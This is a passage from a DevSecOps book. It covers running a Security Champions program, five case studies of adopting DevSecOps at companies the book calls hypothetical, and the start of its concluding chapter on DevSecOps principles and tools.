of your security champions program, evaluate its effectiveness, and make necessary adjustments to ensure it’s meeting its goals.

Things to remember before setting up the program Attracting the right people to your program: • Identify individuals who have a natural interest in security or those who often take initiatives for security enhancements • Build a program that appeals to individuals who are motivated by career growth, knowledge expansion, or simply contributing more to the team and company • Promote the program as an opportunity to enhance skills, gain recognition, and be part of critical decision-making processes

191

192

Setting Up a Security Champions Program

Training Security Champions: • Start with basic training on the importance of security and how it impacts the overall health of the organization • Introduce them to common security threats and how they can be prevented • Provide advanced training on secure coding practices, threat modeling, and more • Consider a continuous training approach with regular updates on the latest security trends and threats Engaging Security Champions: • Make Security Champions part of security discussions and decision-making processes • Encourage them to conduct security awareness sessions for their respective teams • Involve them in the review of policies and processes related to security Delegation: • Delegate tasks that align with the skills and knowledge of the Security Champions • Avoid delegating tasks that need specialized security expertise, unless the champion possesses such expertise • Do not delegate tasks that could potentially expose sensitive or confidential information Communication: • Regular communication is key. This can be through meetings, newsletters, or informal chats. • Keep the team updated on the latest security threats and measures being taken to address them. • Highlight the achievements of the Security Champions to motivate them and others. Motivation: • Provide continuous recognition and rewards for their contributions • Create a growth path for them to become full-fledged security professionals, if they are interested • Encourage them to share their experiences and learnings with the larger team to create a culture of security

Who should be a Security Champion? A Security Champion does not need to start as a security expert. The most important thing is their interest and willingness to learn. Security specifics can be taught and learned over time, with support from the broader security team and the Security Champions network.

Who should be a Security Champion?

First and foremost, a Security Champion needs to have a genuine interest in cybersecurity. They need to be enthusiastic about learning and sharing knowledge in this area. Development teams are on the frontlines, designing and building the organization’s applications. As such, their primary motivation to participate in a Security Champions program might revolve around the following: • Knowledge enhancement: The program can serve as a rich platform for developers to enhance their understanding of security principles and secure coding practices. It’s an opportunity to upskill and grow their careers. • Reduced issues: With better understanding comes the ability to code more securely from the outset. This means fewer security issues discovered later in the development process or after deployment, saving time and resources on rework. • Risk mitigation: By embedding security in their daily tasks, developers are actively reducing the risk of application vulnerabilities. This contributes to the overall resilience of the products they’re building, something they can take pride in. On the other hand, the security teams are focused on mitigating risks and safeguarding the organization’s software infrastructure. Their motivations to support a Security Champions program may include the following: • Increased visibility: The program gives the security team better insight into the development processes and potential security challenges faced by the developers. This aids in providing timely and relevant security solutions. • Amplification of efforts: By training and supporting Security Champions, the security team can multiply their efforts. Each champion acts as an advocate and resource for security within their team, effectively expanding the reach and impact of the security team. • Scalability: As the organization grows, so does the challenge of maintaining security. The Security Champions program allows security best practices and awareness to scale alongside the organization, ensuring a consistent level of security is maintained. • Improved collaboration: Often, security teams can feel distanced from development processes. The Security Champions act as a bridge, improving communication and fostering a stronger relationship between these two key groups.

How a Security Champions program would look The Security Champions program should be well defined so that you can get the most out of it. It should have certain aspects defined very clearly: • Clear purpose: The program should have a clearly defined purpose. This could be to improve the security posture of the organization, enhance the skills of the team, or embed security

193

194

Setting Up a Security Champions Program

culture throughout the organization. This purpose will guide the design and implementation of the program. • Voluntary participation: The program should be open to anyone in the organization who is interested in learning about and contributing to security. Participation should be voluntary and champions should not feel obligated to join or remain in the program. • Support from leadership: The program needs the support and buy-in from executive leadership to be successful. Leaders should understand the value of the program and be willing to invest time, resources, and recognition in the program and its participants. • Defined roles and responsibilities: Champions should have defined roles and responsibilities within the program. This could include tasks such as participating in security reviews, leading security training sessions, or acting as a liaison between their team and the security team. • Training and education: Champions should receive regular training and education on relevant security topics. This could be in the form of formal training sessions, self-paced learning, attending conferences, or learning from security experts within the organization. • Regular communication and meetings: The program should have regular communication and meetings to keep champions engaged, share updates, and discuss challenges and successes. This could be in the form of a monthly newsletter, regular team meetings, or one-on-one check-ins. • Recognition and rewards: Champions should be recognized and rewarded for their contributions to the program. This could be in the form of public recognition, career advancement opportunities, or tangible rewards such as gift cards or merchandise. • Continuous improvement: The program should be regularly evaluated and improved based on feedback from Champions and other stakeholders. This could involve measuring the impact of the program on the organization’s security posture and making adjustments as needed. • Community and culture: The program should foster a sense of community among the champions and help build a culture of security throughout the organization. This could be achieved through team-building activities, shared learning experiences, and collaborative problem-solving. • Shared responsibility: The program should promote a shared responsibility model for security. This means that everyone in the organization, not just the security team, has a role to play in maintaining security. Champions can help spread this message and model secure behaviors for their peers.

The top benefits of starting a Security Champions program A Security Champions program can offer a wide range of benefits for an organization: • Enhanced communication: Security Champions serve as a bridge between the security team and other parts of the organization, improving communication and understanding.

What does a Security Champion do?

• Increased security awareness: Champions help raise awareness about security threats and best practices throughout the organization. This helps create a culture of security. • Improved secure development practices: By promoting security from the beginning of the SDLC, champions can help reduce vulnerabilities in the end product. • Better response to security incidents: With a champion in each team, your organization can identify and respond to security issues more quickly and effectively. • Cost-effective: By catching and fixing potential security issues early in the development process, the champions can help save money on expensive fixes later on. • Scalability: The Security Champions program is a scalable model. As your organization grows, you can continue to add champions, ensuring that security remains a top priority across all teams and projects. • Continuous learning: The program promotes continuous learning and improvement as champions share their knowledge and experiences with each other and their teams. • Employee engagement: The program can boost engagement by providing interested employees an opportunity to learn more about security and take on a leadership role within their team. • Proactive security approach: Instead of a reactive approach to security, where problems are dealt with after they arise, a Security Champions program promotes a proactive approach, with potential issues identified and addressed before they can cause harm. • Business advantage: Last but not least, a solid security posture can offer a competitive advantage, boosting customer trust and potentially leading to increased business.

What does a Security Champion do? A Security Champion plays several crucial roles within an organization: • Security liaison: They act as the primary point of contact for any security issues within their team, coordinating with the central security team when necessary • Security advocate: They promote security awareness within their team, highlighting the importance of secure coding practices and the potential risks of neglecting security • Security mentor: They educate and guide their team members on security best practices and standards, ensuring everyone is equipped to contribute to a secure development environment • Security analyst: They contribute to risk assessments, threat modeling, and security testing efforts within their team, identifying potential vulnerabilities and solutions • Security integrator: They work to integrate security into the SDLC, from design to deployment, ensuring security is not just an afterthought

195

196

Setting Up a Security Champions Program

• Security innovator: They stay updated with the latest trends and developments in the cybersecurity field and bring innovative solutions to improve security within their team and organization • Security problem solver: They help address and resolve security issues that may arise during development, leveraging their understanding of both the technical and security aspects of the project

Security Champions program – why do you need it? A Security Champions program is beneficial for several reasons: • Improved security culture: By having designated individuals promoting good security practices within their teams, the organization can foster a more robust security culture. This increased awareness and knowledge can reduce vulnerabilities. • Better communication: Security Champions can act as a bridge between the security team and the rest of the organization, improving the understanding and communication of security-related matters. • Efficient security integration: Champions help integrate security into every stage of the development process, reducing the potential for costly fixes later on due to security oversights. • Proactive threat management: With trained individuals looking out for security risks in their respective teams, organizations can identify and address threats earlier and more effectively. • Employee development: For individuals interested in security, the program offers a chance to develop their skills and knowledge further, enhancing their career growth. • Scalable security: As an organization grows, a Security Champions program provides a scalable way to ensure that security practices and awareness keep pace. • Customer confidence: Demonstrating a commitment to security can increase customers’ trust in your organization’s products or services. Organizations often feature their Security Champions program on their official website, especially on pages dedicated to security practices and policies. They might also mention the program in blogs, newsletters, or security updates to their customers. • Technical expertise: As they will need to understand and communicate about technical issues related to security, they should ideally have a good understanding of the technology and development practices being used in their team. • Good communication skills: The role of a Security Champion involves acting as a bridge between the security team and their own team, as well as advocating for secure practices. This requires strong communication and persuasion skills. • Respect of peers: To influence their team effectively, a Security Champion should ideally be someone who is respected and listened to by their peers.

Shared responsibility models

• Problem-solving skills: Dealing with security involves handling unexpected challenges and puzzles. A good Security Champion should enjoy problem-solving. • Proactivity: A Security Champion should be proactive, taking the initiative to learn about the latest security threats and countermeasures, and actively looking for ways to improve their team’s security practices.

Shared responsibility models In the context of a Security Champion program, a shared responsibility model refers to how security tasks and responsibilities are divided between the security team, the champions themselves, and the rest of the development team. It’s about ensuring that everyone has a role to play in maintaining and enhancing security: • Security team responsibilities: The central security team provides training and guidance to Security Champions and oversees the overall security strategy. They also handle more complex security issues and keep up with the latest threat intelligence. • Security Champion responsibilities: Security Champions act as the bridge between the security team and the development team. They raise security awareness within their team, provide advice on security-related matters, help incorporate security practices into the development process, and act as the first point of contact for security concerns within their team. • Development team responsibilities: All members of the development team have a part to play in security. They should follow secure coding practices, be aware of common security risks in their work, and follow the advice and guidance provided by their Security Champion and the security team.

The roles of different teams The Security Champions program involves different roles from various teams in an organization, each playing a crucial part in its success. Here’s a general idea of how different teams might be involved: • Sec team: The Sec team provides the necessary training, tools, and guidance to the Security Champions. They also handle advanced security threats and complex issues that require deep expertise. The Sec team works closely with the champions, answering their queries and supporting them in their role. • Dev teams: Members of these teams are the primary audience for the Security Champions. They’re responsible for implementing secure coding practices and integrating security measures into the SDLC. Devs should be open to learning from the Champions and should apply the knowledge shared about security best practices in their day-to-day work.

197

198

Setting Up a Security Champions Program

• Security Champions: Champions themselves are part of the development teams, but they have an additional responsibility to promote and instill a culture of security within their team. They act as the bridge between the Sec and Dev teams, help their peers understand security needs, and participate actively in security planning and risk assessment. • Management/leadership team: The leadership team plays a crucial role in endorsing and supporting the Security Champions program. They need to foster an organizational culture that values security and provides resources for the program’s successful execution. The leadership team is also essential in recognizing and rewarding the efforts of Security Champions, thus encouraging the continuation and growth of the program. • HR and learning and Dev teams: These teams often collaborate to create and deliver training programs for the Security Champions. They also work on the recognition and reward schemes for the champions and can assist in selecting the right individuals for the champion roles. • Ops team: In organizations with a DevOps approach, the Ops team also plays a significant role. They work with the Dev and Sec teams to ensure that secure practices are followed not just during development, but also during the deployment and maintenance stages.

Buy-in from the executive Securing buy-in from executives is a critical part of establishing a successful Security Champions program. Let’s look at a few reasons why executive support is necessary and how it can be secured.

The importance of executive buy-in • Resource allocation: Executive buy-in often translates into allocating necessary resources – such as time, training materials, and perhaps even software or hardware tools – to support the Security Champions program. • Culture shift: For a Security Champions program to be effective, there often needs to be a shift in organizational culture toward prioritizing security. This kind of cultural change typically requires leadership from the top. • Reward and recognition: Executive support can also facilitate the recognition and reward of Security Champions, encouraging their continued efforts and motivating others to participate.

How to secure executive buy-in • Clearly articulate the benefits: Explain how a Security Champions program can help protect the organization from cybersecurity risks, and how it can contribute to the company’s overall goals. • Provide evidence: Use case studies or examples from other organizations to show the effectiveness of Security Champions programs.

Measuring the effect of the Security Champions program

• Show ROI: Try to quantify the potential return on investment. This could be in terms of cost savings from preventing security breaches, or potential gains from improved customer trust and reputation. • Start small: Consider running a pilot program within a single team or department. Demonstrating success on a small scale can help to persuade executives of the value of a wider roll-out. • Continuous communication: Keep the lines of communication open. Regularly update executives on the progress of the program and the positive changes it’s bringing about.

Measuring the effect of the Security Champions program Certain metrics and indicators can be used to evaluate the program’s impact. The key to successful measurement is to identify which metrics are most meaningful for your organization, and then to track them consistently over time. Keep in mind that the true value of a Security Champions program lies in its ability to create a more security-conscious culture, which ultimately leads to safer software development practices.

Technical aspects to check the effectiveness of the Security Champions program Evaluating the effectiveness of a Security Champions program involves examining both quantitative metrics and qualitative feedback. Here’s how this can be done in layperson’s terms: • Reduce security issues: Think of it like you’re trying to lose weight. If you’re seeing the numbers on the scale go down over time, you know your fitness program is working. Similarly, if the number of security issues your organization faces goes down over time, it’s a good sign that the Security Champions program is working. • Quicker problem-solving: Just as a practiced mechanic can fix a car faster, if the time it takes to fix security issues is decreasing, it suggests that your team is getting better and faster at dealing with these problems. This improvement can be credited to your Security Champions program. • Active participation in training: If your team is enthusiastically attending security training sessions and actively participating, it’s like kids who can’t wait to go to their favorite class. This eagerness shows that the team is engaged and taking security matters seriously, a positive outcome of the Security Champions program. • More security reports: If people suddenly start reporting more broken streetlights in a neighborhood, it could mean that they’re paying more attention to their surroundings. An increase in security reports indicates heightened awareness. However, it’s essential to differentiate false positives.

199

200

Setting Up a Security Champions Program

• Feedback from participants: Just like you’d check online reviews before choosing a restaurant, collecting feedback from participants in the Security Champions program can provide valuable insight. If participants are generally positive about the program and believe that it’s beneficial, it indicates that the program is effective. • Cultural shift: Sometimes, the effectiveness of a program is reflected in changes in attitudes and behavior. If your organization starts to value security more and sees it as everyone’s responsibility, then your Security Champions program has done its job. It’s like a neighborhood watch program that results in a community becoming more safety-conscious.

Strategic aspects to check the effectiveness of the Security Champions program • Adoption: Imagine you’ve started a new book club. The club’s success isn’t just about the number of members but also about how actively they participate. It’s about who keeps coming back and who brings their friends along. Similarly, with a Security Champions program, you measure adoption not just by the number of champions you have, but also by how many development teams they influence and how long they stick around. • Engagement: Think of this as a team sport. Not everyone will be equally involved at all times; some might be the star players, while others might be benchwarmers. But what’s important is that everyone feels like they’re part of the team. In the Security Champions program, we don’t just count the hours champions put in. We look at their active involvement, such as attending meetings or initiating security activities. It’s not about penalizing those who are less involved but about finding ways to make the program more interesting for everyone. • Impact: Imagine you’re trying to get your kids to clean their rooms. Instead of doing it for them, you’re teaching them how to do it themselves. Similarly, the goal of the Security Champions program is to empower the Dev teams to handle security issues on their own. By using a scorecard, teams can assess their progress, identify their challenges, and plan improvements. This gives a tangible measure of how much impact the program has had. • Progress: Let’s think of this as learning to play a musical instrument. Some people might be happy strumming a few chords, while others might aspire to play complex solos. You measure progress by noting how far each person has come from their starting point. Similarly, in the Security Champions program, progress isn’t measured by how much champions know compared to others, but how much more they know now compared to when they started.

Summary

Summary In conclusion, a Security Champions program is a highly effective strategy for enhancing an organization’s security posture. It empowers developers and other team members to play a vital role in the organization’s security efforts, fosters a culture of shared responsibility, and creates a community of individuals committed to and educated about security. When implemented correctly, the program bridges the gap between Dev and Sec teams, ensuring that security is integrated seamlessly into the SDLC rather than being an afterthought or a roadblock. It also facilitates continuous learning and development, providing participants with the knowledge and skills to keep up with evolving threats and security best practices. However, creating and maintaining a successful Security Champions program requires strategic planning, executive buy-in, regular training, clear communication, and consistent recognition of participants’ contributions. It’s not a one-size-fits-all solution – it should be tailored to the needs and culture of your organization. In the end, the true measure of the program’s success lies not just in the reduction of security incidents, but also in the growth of your team’s security awareness, the development of a proactive security mindset, and the establishment of security as a shared, organization-wide responsibility. The next chapter will cover some case studies around DevSecOps implementation strategies and stories.

201

Part 6: Case Studies and Conclusion This part covers some case studies and summarizes the book. This part has the following chapters: • Chapter 15, Case Studies • Chapter 16, Conclusion

15 Case Studies Case studies in DevSecOps illustrate real-world examples of how businesses implement DevSecOps principles, the challenges they face, the strategies they employ, and the results they achieve. By studying these case studies, organizations can learn best practices and avoid potential pitfalls in their DevSecOps journey. Here are summaries of five hypothetical DevSecOps case studies that we will cover in this chapter: • FinTech sector (FinServ Corporation): FinServ Corporation, a FinTech company, adopted DevSecOps to enhance its security posture, ensure compliance with various industry regulations, and accelerate software delivery. The transition reinforced customer trust and enabled it to maintain a competitive edge in its market. • Large e-commerce platform (Verma Enterprises): Verma Enterprises adopted DevSecOps to address security issues arising from its Agile-DevOps model. By incorporating a securityfirst mindset and integrating security tools into its CI/CD pipeline, it significantly reduced vulnerabilities, improved regulatory compliance, and accelerated release cycles. • Healthcare provider (HealthPlus): To secure sensitive health data and maintain regulatory compliance, HealthPlus integrated DevSecOps into its software development process. This enhanced its security posture, simplified regulatory compliance, and enabled faster responses to security incidents, all without sacrificing the speed of development. • Government agency (GovAgency): GovAgency transitioned to DevSecOps to address the critical need for security and compliance that’s inherent in government operations. The shift improved its overall security posture, assured compliance, enabled rapid responses to security incidents, and allowed quicker software delivery for more responsive public services. • IT sector (TechSoft): TechSoft, an IT company, adopted DevSecOps to enhance its security posture, ensure compliance with various industry regulations, and accelerate software delivery. This transition reinforced customer trust and enabled it to maintain a competitive edge in its market.

206

Case Studies

Case study 1 – FinTech Corporation Let’s consider a hypothetical global financial services firm, FinServ Corporation. FinServ has a large, complex technology environment due to its size and the nature of its business. Its IT team was traditionally siloed, with distinct teams for development, operations, and security. Software development at FinServ was initially structured around a waterfall model, with lengthy development cycles and infrequent, large-scale software releases. As the company faced increased competition, the need for more rapid and iterative software releases became evident. This led to the adoption of Agile and DevOps practices to increase the speed and frequency of deployments.

Challenges faced before implementing DevSecOps • Security was a bottleneck: Security reviews were conducted at the end of development cycles and often identified issues requiring significant rework. This caused delays in software releases and frustration among the development teams. While security can be a bottleneck if implemented incorrectly, it’s not inherently a bottleneck. • Lack of shared responsibility for security: The DevOps teams viewed security as the exclusive responsibility of the security team, leading to a lack of accountability for security issues among developers and operations staff. • Increased risk of breaches: With an increased frequency of deployments, the risk of security vulnerabilities making it to production also increased.

Steps were taken to transition to DevSecOps • Culture shift: The first step was fostering a culture where everyone was responsible for security. This involved training for Dev and Ops staff on security best practices and the importance of secure coding. • Incorporating security into the CI/CD pipeline: FinServ implemented automated security checks into their CI/CD pipeline, such as SAST and DAST, allowing for early and frequent security checks. • Regular communication and collaboration: Cross-functional meetings were instituted to encourage better communication between the Dev, Ops, and Sec teams.

Results and impact on the company’s software development • Improved security posture: Early and frequent security testing led to a reduction in vulnerabilities in the production code, improving the overall security of the company’s applications.

Case study 2 – Verma Enterprises

• Reduced time to market: With security integrated into the DevOps pipeline, there was a reduction in delays associated with late-stage security rework. This improved the speed and efficiency of software releases. • Increased collaboration and shared responsibility: The culture shift toward shared responsibility for security improved collaboration between teams and increased accountability among developers and operations staff.

Lessons learned • Security as a shared responsibility: It’s crucial to foster a culture where security is seen as everyone’s responsibility, not just the Sec team • Early and frequent security checks: Incorporating security into the CI/CD pipeline enables early identification and rectification of vulnerabilities • Effective communication and collaboration: Regular communication and collaboration between teams is key to successfully implementing DevSecOps

Case study 2 – Verma Enterprises Verma Enterprises is a hypothetical global e-commerce platform that caters to millions of customers and hosts hundreds of thousands of sellers. Its platform involves complex architectures, including web servers, database systems, microservices, and APIs, all working together to deliver a seamless shopping experience. Initially, Verma Enterprises employed a traditional waterfall model for software development. As the need for frequent updates and quicker deployment cycles became more evident, it transitioned to an Agile-DevOps model. This move increased its deployment speed and frequency, enabling it to better respond to changing customer needs and market dynamics.

Challenges faced by the organization in terms of security • Delayed security testing: Like many DevOps models, security testing was a separate stage conducted at the end of the development cycle. This late-stage security testing often revealed vulnerabilities that required significant rework, causing costly delays. • Escalating cybersecurity threats: Being a global e-commerce platform, Verma Enterprises was an attractive target for cybercriminals. The increase in cyber-attacks demanded a more proactive and integrated approach to security. • Regulatory compliance: Due to the nature of its business, Verma Enterprises needed to comply with numerous data security regulations. Maintaining compliance was a continuous challenge, especially with the fast-paced DevOps cycles.

207

208

Case Studies

Implementation of DevSecOps practices and tools To tackle these challenges, Verma Enterprises decided to incorporate DevSecOps principles into its software development process: • Security as a cultural shift: It began by instilling a security-first mindset across the organization. Devs, Ops teams, and security personnel were trained to view security as a shared responsibility. • Integration of security into CI/CD pipeline: Verma Enterprises integrated security tools into its existing CI/CD pipeline. SAST and DAST were incorporated into the early stages of the pipeline, allowing vulnerabilities to be detected and fixed before they could reach production. • Automated compliance checks: To address regulatory challenges, Verma Enterprises used automated compliance tools. These tools checked for compliance continuously throughout the development life cycle, reducing the risk of non-compliance.

Results and benefits achieved • Increased security: Early and frequent security testing greatly reduced the vulnerabilities that made it to production. The number of successful cyber-attacks dropped significantly. • Faster release cycles: By removing the need for late-stage security rework, Verma Enterprises reduced its software release cycles. This allowed it to respond more quickly to market changes and customer demands. • Improved compliance: The continuous compliance checks greatly simplified regulatory compliance, reducing the risk of violations and penalties. Verma Enterprises’ transition to DevSecOps demonstrates how organizations can enhance their security posture without sacrificing speed and agility. By integrating security into every stage of the software development life cycle, Verma Enterprises was able to secure its platform, improve compliance, and deliver faster updates to its customers.

Case study 3 – HealthPlus Our subject here is HealthPlus, a hypothetical large healthcare provider that operates numerous hospitals and clinics and uses complex software systems to manage patient data, medical records, scheduling appointments, and billing. Its software environment is a mix of legacy systems and newer cloud-based applications. Initially, HealthPlus followed a traditional waterfall model for software development. However, with the increased need for real-time data, it transitioned to an Agile-DevOps model, which significantly improved the speed and flexibility of its software development and deployment process.

Case study 3 – HealthPlus

The importance of security in healthcare data and systems Healthcare providers such as HealthPlus manage extremely sensitive data, such as patient health records and personally identifiable information (PII). As such, they are bound by strict regulations such as the Health Insurance Portability and Accountability Act (HIPAA) in the US or the General Data Protection Regulation (GDPR) in the EU. Furthermore, healthcare providers are prime targets for cyberattacks, which can lead to data breaches, financial losses, reputational damage, and potentially severe consequences for patient care.

The implementation of DevSecOps practices and tools to improve security • Cultural shift: HealthPlus began by promoting a culture of shared responsibility for security. This involved training and awareness programs for developers, operations staff, and the security team. • Security integration: HealthPlus incorporated security checks into its existing CI/CD pipeline. This included SAST and DAST, as well as automated compliance checks to ensure adherence to healthcare-specific regulations. • Security monitoring and incident response: HealthPlus implemented continuous security monitoring tools to detect potential breaches or attacks in real time. It also developed an incident response plan to address potential security incidents quickly and effectively.

Results and benefits achieved • Improved security posture: By integrating security checks early and often throughout the development process, HealthPlus greatly reduced the number of vulnerabilities in its software systems. This significantly improved its overall security posture and reduced the risk of data breaches. • Enhanced compliance: The continuous compliance checks simplified the process of maintaining adherence to healthcare regulations. This reduced the risk of non-compliance and potential associated penalties. • Faster response to security incidents: The continuous security monitoring and incident response plan allowed HealthPlus to quickly detect and respond to security incidents, minimizing potential damage. • Accelerated deployment: By removing the bottleneck of late-stage security reviews, HealthPlus was able to accelerate its software deployment cycles, delivering new features and improvements to its users more quickly. The implementation of DevSecOps at HealthPlus highlights how healthcare providers can improve security and compliance without sacrificing the agility and speed of DevOps.

209

210

Case Studies

Case study 4 – GovAgency Let’s imagine a hypothetical government agency, GovAgency, that is responsible for providing numerous public services, including tax processing, benefit distribution, and identity verification. Its systems are a complex mixture of legacy and modern applications, processing vast amounts of sensitive personal data daily. Initially, GovAgency followed traditional, bureaucratic software development processes with lengthy approval chains, resulting in slow and infrequent software updates. However, in recent years, it shifted to an Agile-DevOps model to improve responsiveness and service delivery.

Security requirements for government agencies Security and compliance are paramount for government agencies such as GovAgency. It must adhere to strict regulations such as the Federal Information Security Management Act (FISMA) in the US, and it manages highly sensitive data that could have national security implications if breached. Furthermore, being a government body, GovAgency is highly visible and a potential target for cyberattacks, including state-sponsored attacks, which can be highly sophisticated and damaging.

The implementation of DevSecOps practices and tools to meet compliance and improve security Given these security and compliance imperatives, GovAgency decided to implement DevSecOps practices and tools: • Culture shift: GovAgency initiated an organization-wide culture change, emphasizing that security was everyone’s responsibility. This shift was supported by comprehensive training and awareness programs. • Security integration: GovAgency integrated security testing tools into its CI/CD pipeline. This included SAST and DAST, automated compliance checks, and container security to ensure the security of its increasingly containerized applications. • Continuous monitoring and response: GovAgency also implemented real-time security monitoring and a robust incident response plan to detect and address any security breaches swiftly.

Results and benefits achieved • Enhanced security: Early and frequent security testing resulted in fewer vulnerabilities in its software, reducing the risk of data breaches and improving their overall security posture. • Compliance assurance: The continuous compliance checks automated much of the compliance process, reducing the risk of violations and the potential costs and reputational damage associated with non-compliance.

Case study 5 – TechSoft

• Rapid incident response: The security monitoring and incident response plan allowed GovAgency to respond quickly to potential security incidents, minimizing their impact and the potential disruption of services. • Faster delivery: By incorporating security into the DevOps pipeline, GovAgency could accelerate its software delivery, enabling quicker updates and more responsive public services. This case study demonstrates the transformative potential of DevSecOps in a government setting, delivering enhanced security, assured compliance, and faster service delivery despite the unique challenges and pressures faced by such organizations.

Case study 5 – TechSoft Let’s discuss TechSoft, a hypothetical global IT company that specializes in developing business software solutions across different industries, from finance to healthcare. TechSoft operates on a large scale, with thousands of developers working on multiple projects concurrently. TechSoft had adopted Agile-DevOps practices to maintain a competitive edge, deliver frequent updates, and respond rapidly to market demands. This approach, however, has had the side effect of increasing the complexity of its software development environment, which consists of a diverse technology stack and vast code base.

Security requirements for the IT sector Given the nature of its business, TechSoft is expected to adhere to a variety of industry-specific security standards, such as ISO 27001, and regulations depending on their clients’ sectors (for example, HIPAA for healthcare and PCI-DSS for finance). Beyond regulatory compliance, the trust of TechSoft's clients hinges on its ability to develop secure software that can withstand the escalating threat landscape.

The implementation of DevSecOps practices and tools to meet compliance and improve security To manage these challenges and reinforce their security posture, TechSoft decided to adopt DevSecOps. Its approach involved the following: • Promoting a security culture: TechSoft began by promoting a culture of shared responsibility for security. This involved training for developers, operations staff, and the security team to cultivate a security-first mindset. • Security integration: TechSoft integrated security tools into its existing CI/CD pipeline, allowing early detection of vulnerabilities. This included both SAST and DAST tools, as well as software composition analysis (SCA) tools to inspect third-party libraries and components for potential vulnerabilities.

211

212

Case Studies

• Automated compliance: To ease the burden of complying with a wide range of regulations, TechSoft utilized automated compliance check tools within its development pipeline.

Results and benefits achieved • Enhanced security posture: Early and frequent security testing significantly reduced the vulnerabilities in its software, leading to a stronger security posture and enhanced client trust. • Regulatory compliance: Automated compliance checks greatly simplified the process of maintaining adherence to multiple industry regulations, reducing the risk of violations. • Accelerated delivery: By removing the bottleneck of late-stage security reviews, TechSoft accelerated its software delivery, enabling more rapid updates and improvements for its clients. • Customer trust: The visible commitment to security and the demonstrated reduction in vulnerabilities helped build customer trust, a crucial factor in TechSoft’s competitive landscape. In conclusion, TechSoft’s successful implementation of DevSecOps provides a strong example of how companies in the IT sector can effectively balance the need for rapid, agile software development with robust security and compliance.

Common lessons learned and best practices Several common themes emerge from these case studies: • Culture shift: In each case, the organization recognized the need for a cultural change toward security being everyone’s responsibility. This typically involved extensive training and awareness programs. • Security integration: Each organization integrated security into its CI/CD pipeline, enabling it to detect and remediate vulnerabilities early in the development cycle. • Continuous monitoring and compliance: Continuous security monitoring and compliance checks were crucial for detecting potential breaches in real time and ensuring adherence to necessary regulations.

Lessons learned from implementing DevSecOps practices and tools • Early integration is key: Integrating security early in the development cycle is more effective and efficient than trying to bolt it on later. • Security is everyone’s responsibility: A successful DevSecOps implementation requires a cultural shift toward shared security responsibility. It cannot be the sole province of a separate security team.

Summary

• Continuous learning and improvement: The security landscape is continuously evolving. Therefore, continuous learning and improvement are vital for maintaining an effective security posture.

Best practices for implementing DevSecOps in software development • Culture shift: Foster a culture where every team member, from Devs to Ops, takes responsibility for security. This can be supported by training and awareness programs. • Security into the pipeline: Integrate security testing and compliance checks into your CI/CD pipeline. Use automated tools for SAST and DAST, container security, and compliance checks. • Continuous monitoring: Implement real-time security monitoring tools to detect potential breaches or attacks swiftly. • Incident response plan: Develop an effective incident response plan to ensure quick and effective handling of any security incidents. • Feedback loops: Implement feedback loops to learn from incidents and continually improve your security posture. • Staying updated: Continuously educate the team on the latest threats and best security practices to stay ahead in the rapidly evolving security landscape.

Summary The case studies that were outlined in this chapter demonstrated the practical implementation of DevSecOps across a diverse range of industries and highlighted the significant benefits that can be reaped from this approach. From a Fintech sector (Finserv Corporation) to a large e-commerce platform (Verma Enterprises), a healthcare provider (HealthPlus), a government agency (GovAgency), and an IT company (TechSoft), each organization showcased the transformative power of integrating security into the heart of their development and operations processes. A common theme throughout these case studies was the shift toward a culture where security is everyone’s responsibility. This cultural shift, underpinned by ongoing training and awareness programs, was a key factor in their successful DevSecOps implementations. Another crucial takeaway is the early integration of security within the CI/CD pipeline, leading to early detection and mitigation of vulnerabilities. This resulted in improved security postures for these organizations and better compliance with industry regulations. Lastly, DevSecOps helped these organizations accelerate their software delivery processes. By catching and fixing vulnerabilities earlier in the development life cycle, they reduced the costs and time required for remediation, leading to quicker software releases.

213

214

Case Studies

These case studies demonstrated that regardless of an organization’s size or the industry it operates in, a well-executed shift to DevSecOps can result in significant benefits. It enhances security, improves regulatory compliance, speeds up software delivery, and provides a robust foundation for building high-quality software solutions in the modern digital world. In the next chapter, we will summarize the main topics covered in the book.

16 Conclusion DevSecOps in Action has provided a comprehensive exploration of the principles and practices of DevSecOps, illuminated through a series of real-world case studies across diverse industries. Each case study has highlighted the transformative impact of embedding security within the heart of development and operations, reiterating that a cultural shift toward shared security responsibility is critical for modern software development. Key insights from this book include the value of early integration of security within the CI/CD pipeline, the importance of ongoing training and awareness programs, and the power of continuous monitoring and automated compliance checks. The case studies underscored these points, demonstrating improved security postures, better regulatory compliance, and accelerated software delivery. Perhaps most importantly, this book has stressed that a successful DevSecOps transition is not about a one-off project or change but a continuous journey of learning and improvement. This journey requires staying updated on the latest security threats and mitigation strategies and continually refining and enhancing DevSecOps practices. In conclusion, DevSecOps in Action is a valuable guide for organizations seeking to understand and implement DevSecOps. It proves that regardless of size, sector, or complexity of operations, a wellexecuted shift to DevSecOps can yield significant benefits, leading to safer, high-quality, and more efficient software delivery. Through its practical approach and real-life examples, this book has equipped you with the knowledge and confidence to undertake a DevSecOps journey.

DevSecOps – what and how? DevSecOps is a philosophy that integrates security practices within the DevOps process. It is a natural evolution of the term DevOps, where teams use automation and monitoring in all steps of the software construction process. The central idea is “Security as Code,” meaning security controls are managed and automated just like any other software. A funny way to look at it is that it’s like getting someone to brush their teeth daily; it’s a lot easier if you integrate it as a habit rather than a separate task.

216

Conclusion

DevSecOps principles and processes The key principle behind DevSecOps is the integration of security in every part of the development process, rather than it being a separate stage. Imagine trying to staple together separate pieces of a project at the end; it’s more prone to fall apart. Instead, embedding security from the start is like weaving a sturdy safety net into the project’s fabric. The DevSecOps processes involve CI, CD, and IaC. These are executed with an eye on security. There are automated security checks at every integration and deployment, and security vulnerabilities are dealt with as they come up, instead of being relegated to the end.

DevSecOps tools There’s a broad array of tools that support DevSecOps. Here are some of them: • Static application security testing (SAST) tools, such as Snyk and SonarQube, examine source code for potential security vulnerabilities. It’s like having a grammar checker for your code! • Dynamic application security testing (DAST) tools, such as OWASP Zap and Nessus, identify vulnerabilities in a running application. It’s like a secret agent spying on the application but for good reasons. • Container security tools, such as Aqua and Twistlock, provide security for your Docker and Kubernetes environments. It’s like a personal bodyguard for your containers! • Security orchestration and automated response (SOAR) tools such as Splunk Phantom, IBM Security Resilient, and Palo Alto Networks Cortex XSOAR help automate and manage responses to security events. They are like an automated firefighter, ready to put out security fires.

DevSecOps techniques The techniques for implementing DevSecOps involve making security an integral part of the software development life cycle. They include threat modeling, secure coding practices, regular code reviews, automated testing, and more. Imagine your code as a house you’re building – these techniques are the equivalent of setting a strong foundation, using quality materials, regularly checking for cracks, and ensuring safety standards are met.

